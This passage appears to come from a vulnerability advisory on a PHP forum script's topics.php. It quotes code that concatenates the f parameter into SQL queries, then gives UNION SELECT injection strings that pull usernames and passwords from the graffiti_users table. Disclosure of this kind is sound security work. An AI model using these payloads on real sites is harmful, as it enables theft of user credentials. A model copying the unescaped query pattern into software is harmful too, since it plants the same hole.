1) vulnerable code: $sql = "SELECT forum FROM graffiti_forums WHERE id=$f"; $result = mysql_query($sql); $sql_row = mysql_fetch_row($result); $forum_title = $sql_row[0]; [...] ==[ end topics.php ]========================== How we can see there's no protection for the using of simple quotes in the sql query. Also we have to say that the script doesn't work with register_globals off. In this way, we can put in the $f variable something like that 2 UNION SELECT password as forum FROM graffiti_users So the sql query looks like this: SELECT forum FROM graffiti_forums WHERE id=2 UNION SELECT password as forum FROM graffiti_users ? Here, 2 is a valid forum id. Using some ORDER BY clauses you can get differents things... check it out. 2) ==[ topics.php 21-32 ]========================== [...] if (!$option){ $sql = "SELECT id, topic FROM graffiti_topics WHERE id_forum=" . $f; if ($result = mysql_query($sql)){ echo("<center><table width=400 border=1>"); while ($sql_row = mysql_fetch_row($result)){ echo("<tr>"); echo("<td>"); $id = $sql_row[0]; $topic = $sql_row[1]; echo("<font face='Arial' size=3>"); echo("<img src='./graphics/paper.gif' border=0> &nbsp;<a href='messages.php?t=$id&f=$f'>$topic</a>"); echo("</font>"); [...] ==[ end topics.php ]========================== In the SQL query of this code we can see the same bug. The explotation is very similar that the other: topics.php?f=2 UNION SELECT password as topic, username as id FROM graffiti_users The final sql query looks like this: SELECT forum FROM graffiti_forums WHERE id=2 UNION SELECT password as topic, username as id FROM graffiti_users Here, 2 is a valid forum id. Another time you can play with some ORDER BY or GROUP BY clauses.